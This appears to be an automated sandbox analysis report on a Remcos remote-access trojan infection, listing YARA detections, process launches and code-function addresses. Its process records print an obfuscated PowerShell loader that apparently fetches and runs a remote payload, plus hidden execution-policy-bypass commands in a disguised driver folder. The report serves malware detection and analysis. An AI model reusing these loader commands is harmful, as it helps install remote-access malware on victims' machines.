                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2903471856.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2924119312.00000000026BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.2387288107.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041CA73 SystemParametersInfoW,22_2_0041CA73

                    System Summary

                    barindex
                    Source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 5500, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00401806 NtdllDefWindowProc_W,27_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_004018C0 NtdllDefWindowProc_W,27_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_004016FD NtdllDefWindowProc_A,28_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_004017B7 NtdllDefWindowProc_A,28_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00402CAC NtdllDefWindowProc_A,29_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00402D66 NtdllDefWindowProc_A,29_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,22_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D82DFA2_2_00007FF848D82DFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E22FF54_2_00007FF848E22FF5
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E2217D4_2_00007FF848E2217D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E239D15_2_00007FF848E239D1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E230E95_2_00007FF848E230E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848E230E96_2_00007FF848E230E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848E20ECD13_2_00007FF848E20ECD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848E2042513_2_00007FF848E20425
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_1001719416_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_1000B5C116_2_1000B5C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848D4878019_2_00007FF848D48780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043706A22_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041400522_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043E11C22_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004541D922_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004381E822_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041F18B22_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0044627022_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043E34B22_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004533AB22_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0042742E22_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043756622_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043E5A822_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004387F022_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043797E22_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_004339D722_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0044DA4922_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00427AD722_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041DBF322_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00427C4022_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00437DB322_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00435EEB22_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0043DEED22_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00426E9F22_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044B04027_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0043610D27_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044731027_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044A49027_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0040755A27_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0043C56027_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044B61027_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044D6C027_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_004476F027_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044B87027_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044081D27_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0041495727_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_004079EE27_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00407AEB27_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044AA8027_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00412AA927_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00404B7427_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00404B0327_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0044BBD827_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00404BE527_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00404C7627_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00415CFE27_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00416D7227_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00446D3027_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00446D8B27_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_00406E8F27_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0040503828_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0041208C28_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_004050A928_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0040511A28_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0043C13A28_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_004051AB28_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0044930028_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 28_2_0040D32228_2_0040D322
